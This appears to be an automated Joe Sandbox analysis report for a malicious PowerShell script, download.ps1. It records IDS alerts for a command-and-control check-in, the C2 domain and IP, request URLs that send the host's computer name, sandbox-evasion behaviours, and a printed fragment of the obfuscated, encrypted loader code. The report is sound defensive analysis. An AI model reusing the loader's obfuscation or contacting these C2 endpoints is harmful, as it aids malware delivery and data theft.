Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1585431
MD5:09a972869de8f5ccaa725f74ed664eb1
SHA1:4c5c96057bbb64b6fec356875e8054ab5cf87bb9
SHA256:153b7fdc3db3b4bfb6cbe37338c7c3c1393755c0b67c896149538ca6f8032839
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7384, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7384, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T16:46:02.991136+010020577411A Network Trojan was detected192.168.11.204974345.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T16:46:02.991136+010018100002Potentially Bad Traffic192.168.11.204974345.61.136.13880TCP
2025-01-07T16:46:03.369182+010018100002Potentially Bad Traffic192.168.11.2049744172.217.1.10080TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://jjdgdeffjimfgne.topAvira URL Cloud: Label: malware
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbg source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.15487537362.000001A3F3B4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ']{S source: powershell.exe, 00000000.00000002.15487537362.000001A3F3AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3E5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.15489547647.000001A3F3DF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15486330108.000001A3F37B8000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49743 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49744 -> 172.217.1.100:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49743 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: jjdgdeffjimfgne.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: jjdgdeffjimfgne.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: jjdgdeffjimfgne.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$kunxogyfrzhm872/$7pqtrusyc96w32k2ptekhb6ufiod0.php?id=$env:computername&key=$ktyawmgsh&s=527
Source: powershell.exe, 00000000.00000002.15485936625.000001A3F3791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.15485936625.000001A3F3791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.15489452320.000001A3F3C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micrH
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jjdgdeffjimfgne.top
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jjdgdeffjimfgne.top/0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DD1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD185000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXz
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comPa
Source: powershell.exe, 00000000.00000002.15486330108.000001A3F37CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comh
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.15486330108.000001A3F37CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF828DB8E220_2_00007FF828DB8E22
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF828DB80760_2_00007FF828DB8076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8290134090_2_00007FF829013409
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF829015AFF0_2_00007FF829015AFF
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv3uq31w.wzh.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $kuq6na5co8w4hyl.(([system.String]::new(@((-9152+(54917583/(12618-6661))),(1065378/9598),(-7957+(18259-10190)),(-1712+(664+(11115-9946))),(449484/(9776277/1827)),(-1258+1369)))))( $gi6wu2rjo5c9hka ) $kuq6na5co8w4hyl.((-join (@((-890+957),(1525-1417),(-3353+(8882-(6194-(4389832/5657)))),(5134-(3573528/712)),(351884/(10177-6693)))| ForEach-Object { [char]$_ })))()$mjsh8zr12yi4g6x.((-join (@((-8532+(51035065/5935)),(-708+816),(7131-(34025940/4847)),(-574+(2780-2091)),(4966-(14655-(62372090/6371))))| ForEach-Object { [char]$_ })))()[byte[]] $pje2x0l6soqmigb = $gi6wu2rjo5c9hka.((-join (@((1349-1265),(-7890+(1866+(4961+1174))),(203320/(-2612+(15154-(32977242/3503)))),(-10043+(95902394/(2799+(32842992/(21189984/4286))))),(5212-(7492-(10710756/4474))),(-3006+(4148711/1337)),(3854-(6953-(3392-172))))| ForEach-Object { [char]$_ })))() $r1xb8ky6j9g2430=$pje2x0l6soqmigb return $r1xb8ky6j9g2430}[System.Text.Encoding]::ascii.(([system.String]::new(@((2009-(5734-3796)),(109181/(-833+1914)),(-4465+(4667-(594862/(33333023/(630+(7848-3659)))))),(-465+548),(-3642+3758),(3589-(6273-(25092464/8968))),(-3717+3822),(430540/(2418852/(-183+(6820-6019)))),(1047922/(12265-(1944630/930)))))))((oejuntf8wdq5xib093712lmvs4g "aeE/czBwenJtMvX1HQUrJEL2RTXpzKuuFhxQoVmFwy1FOmHe7aeQnzKpdTMJKmkr+U5tYRkhuccNnZcV6N15fBWalOdloUoJzCWoIMUu0BiH7NEFCSUpTIsMAoiF6f8RTTZqzU6Euf1mfJ7BgQ3g9MO78cGiuauQg4vJutOX7aUODVQUgwrM7Muzhi1GzBiXiq/CEk+FrbGA05K7mLTB8JusobxWbPYxGtzIze2+S9RZXyuH15yl5eoMop+XR3MShL8aqNwD5xGZfFea06aegn0EH6ynm9zH4sLot2QMsDllA7OFCoZaqv7OCJ/xkfPZ062jy1A7ozXeQpXSpXVpLk3YptvcCI+E5beJCd7gMZyaBBjZpCBvxRlLtbn/7qMWHQICvJHmuIUa/kUhx57zTHoFw4oMKerFR9KJH40DU7/MVweB6hG8BtpNL4y4IZ+HR53qnd/rRS83z6+Hr/nOXD8Ppu10BNcCyFFMAUqFh7uWXxazx/HB3N/OhSwSZTohZQH7Bcvup8aEjyW/I7H0qrfkXG3apH/U3TDw7wJrJAGFxPr4LPdtnWr2dcxShYDli8CCTUEtZdR3T9nDFMXv6lUrA619cN6jmceHPoy0yWZ0cJrVx0uCAYS5jZQ0aCJwvaAKAqcdMMu81P54BN8o9PZBj6qCrrBYAAMEsdSHxa0EjRObkL9WjMyuJX0+1X/hyZXBqLuNNfamdJnNsQxoqCxj3R1exEEgrYZtV3r40kB4aIPQEbwEHmMAs+fPSoMN2QBfILshQeeDnm+6RZ8tyW7mB5ifzP4y7THXPuqvYMv/xSZFgauV4U2GV+XMlVwM0hqyysgeAagqGgQnXnb2CXrR7uyScGw1Xr4lLm747NA6H8GqPHb6tyPbtG4kvwQLLqmfCNeXrJ+R1HjN7SiFZxBazsvwSthbHk096gBlOKRrTR+ZuMGovT8XNcROtcOFi4SgyEeOk+XyXraijf0siPXf4S0nrHaw6pTDj8HbXaHq/x41DQS2aMim7/fHp8HIOEKnFv5bmTpgBEdUk/daFBr5vfyNeYAleRubE0cPiYIDTZKaiIzg/OyMq5vaZXfXTf0fN1GRxPz91WhFQbTx5WgzcPjE+l/VE6HZigBj1Q9eXwOH6B8DU/T+MJWvbKWjDZUi2NF2NPMvEp+qxRuoreiQ7tArp23q2g0z2DJLKm4y/+aVrFKB6Us7S2Isg7HzDtNYXcrcreBXI0SNyt/Rd7iEksg3kciKi1ux7Xt0quD3D23RwgbGS0GrIOFrg5nhaghVcl5Nmq/uqT8y3kshgwQ9OiiLf9l5NBg5zVqJPn2WmH1ahFcYH0GNGh2R3YyehqfStuWZ6eWmLARjjpXQisn6IunmMpZJhB08VyFT94b1t/i0xSJxeIQ5Q0BgSjCZ+rYc/bBzwglPnFSuJ7JjQRD1+7QZumq8ZfqShLF1Xtz2DqcDhr/1n20l+KaNu++ELUEuLTD+qcoufv3VoMoAF/+hHuXqb1UoqX2vuT8Ayf8L/6UJJ2fDQfXgifJwJI/awfcgYl5Nth6M+rE6l14V9FRoI5nCHLx7cr+/FseZd4GpdyYOAnz6wzgGVQiu58NTWdPSlN59uwkDDkrfN+7jrb0yAZTYMwhRYMOUhMweeKrpLCC98fTxHRZyYO6PuPVKBBtbQqhq4DM8mWhVKmo85vmLu3ca/KLDb6T8uaaQyfxNGXXaHosnKyj1Y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
